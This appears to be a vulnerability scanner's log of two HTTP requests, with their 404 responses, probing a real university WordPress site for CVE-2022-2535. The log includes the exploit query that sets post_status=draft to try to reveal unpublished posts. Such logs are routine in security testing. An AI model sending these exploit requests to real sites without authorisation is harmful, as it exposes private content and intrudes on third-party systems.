[CVE-2022-2535] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish


GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


[CVE-2022-2535] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 2
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 c6cf91c1274050d33d12227585fc8efc.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pFy97-6p5wr1HX1Q2R4Z9IypWDWu7E1jedtQMM3kL-VjkyPPNNJO4A==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

[CVE-2022-2535] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft


GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


[CVE-2022-2535] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 3
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 ee011275acb236653ac4d031eb9a7092.cloudfront.net (CloudFront)
X-Amz-Cf-Id: SlhKKt32NdZfyp8Y_y7WkTwqgM2BJz2W5CMx_mcpJkKs-bP0s7CR8g==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

